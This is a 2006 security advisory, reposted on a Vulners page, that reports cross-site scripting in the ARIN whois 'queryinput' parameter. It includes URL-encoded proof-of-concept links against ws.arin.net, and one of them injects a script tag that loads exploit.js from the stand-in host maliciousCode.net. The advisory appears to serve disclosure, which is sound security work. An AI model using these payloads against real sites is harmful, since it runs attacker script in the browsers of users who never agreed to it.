Vulners
Lucene search
arinXSS.txt
🗓️ 06 Mar 2006 00:00:00Reported by Terminal Entry SecurityType 
packetstorm🔗 packetstormsecurity.com👁 20 Views
`This is a multi-part message in MIME format.
--_117C6D30-EC32-4CA9-A4BD-07EFF66F2B52_
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Title
ARIN.NET input validation holes in "?queryinput=3D" allows remote users =
conduct cross-site scripting attacks
Notification
Multiple attempts to contact Arin site administrators went unanswered
Exploit Included: Yes
Description
The "?queryinput=3D" script does not properly validate user-supplied =
input in several parameters to filter HTML code. A remote user can =
create a specially crafted URL that, when loaded by a target user, will =
cause arbitrary scripting code to be executed by the target user's =
browser.=20
Some demonstration exploit URLs are provided:
http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22javascript%3Aalert=
%28%27XSS%27%29%3B%22%3E
http://ws.arin.net/whois/?queryinput=3D%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalic=
iousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22javascript%3Aalert=
%28%27XSS%27%29%3B%22%3E
Discovered by Terminal Entry security [.at.] peadro (.)net
This email and any files transmitted with it are confidential and =
intended
solely for the use of the individual or entity to whom they are =
addressed. If you have received this email in error please notify the =
system manager. This
message contains confidential information and is intended only for the =
individual named. If you are not the named addressee you should not =
disseminate,
distribute or copy this e-mail. Please notify the sender immediately by =
e-mail if you have received this e-mail by mistake and delete this =
e-mail from your
system. If you are not the intended recipient you are notified that =
disclosing, copying, distributing or taking any action in reliance on =
the contents of this
information is strictly prohibited.
--_117C6D30-EC32-4CA9-A4BD-07EFF66F2B52_
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML dir=3Dltr><HEAD></HEAD>
<BODY>
<DIV><FONT face=3DArial color=3D#000000 =
size=3D2><STRONG>Title</STRONG></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000><FONT size=3D2><FONT =
face=3DArial>ARIN.NET input validation holes in "?queryinput=3D" allows =
remote users conduct cross-site scripting =
attacks</FONT><BR></FONT></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000><FONT =
size=3D2><STRONG>Notification</STRONG><BR>Multiple attempts to contact =
Arin site administrators went unanswered</FONT></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000 size=3D2></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><STRONG>Exploit =
Included:</STRONG> Yes</FONT></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial =
size=3D2><STRONG>Description</STRONG></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000 size=3D2><FONT face=3DArial =
size=3D2>The "?queryinput=3D" script does not properly validate =
user-supplied input in several parameters to filter HTML code. A remote =
user can create a specially crafted URL that, when loaded by a target =
user, will cause arbitrary scripting code to be executed by the target =
user's browser. </FONT><BR></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000 size=3D2><FONT face=3DArial =
size=3D2>Some demonstration exploit URLs are =
provided:</FONT></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000 size=3D2><A =
href=3D"http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22javascript=
%3Aalert%28%27XSS%27%29%3B%22%3E" =
target=3D_blank>http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22ja=
vascript%3Aalert%28%27XSS%27%29%3B%22%3E</A><BR><A =
href=3D"http://ws.arin.net/whois/?queryinput=3D%3CSCRIPT+SRC%3Dhttp%3A%2F=
%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E" =
target=3D_blank>http://ws.arin.net/whois/?queryinput=3D%3CSCRIPT+SRC%3Dht=
tp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E</A><BR><A =
href=3D"http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22javascript=
%3Aalert%28%27XSS%27%29%3B%22%3E" =
target=3D_blank>http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22ja=
vascript%3Aalert%28%27XSS%27%29%3B%22%3E</A></FONT></DIV>
<DIV><FONT face=3DArial color=3D#000000 size=3D2><BR>Discovered by =
Terminal Entry security [.at.] peadro =
(.)net<BR><BR></DIV></FONT></BODY><!--[object_id=3D#peadro.net#]--><P>
<HR>
<EM><FONT face=3DArial size=3D2>This email and any files transmitted =
with it are confidential and intended solely for the use of the =
individual or entity to whom they are addressed. If you have received =
this email in error please notify the system manager. This message =
contains confidential information and is intended only for the =
individual named. If you are not the named addressee you should not =
disseminate, distribute or copy this e-mail. Please notify the sender =
immediately by e-mail if you have received this e-mail by mistake and =
delete this e-mail from your system. If you are not the intended =
recipient you are notified that disclosing, copying, distributing or =
taking any action in reliance on the contents of this information is =
strictly prohibited.</FONT></EM></P></HTML>
--_117C6D30-EC32-4CA9-A4BD-07EFF66F2B52_--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2006 00:00Current
7.4High risk
Vulners AI Score7.4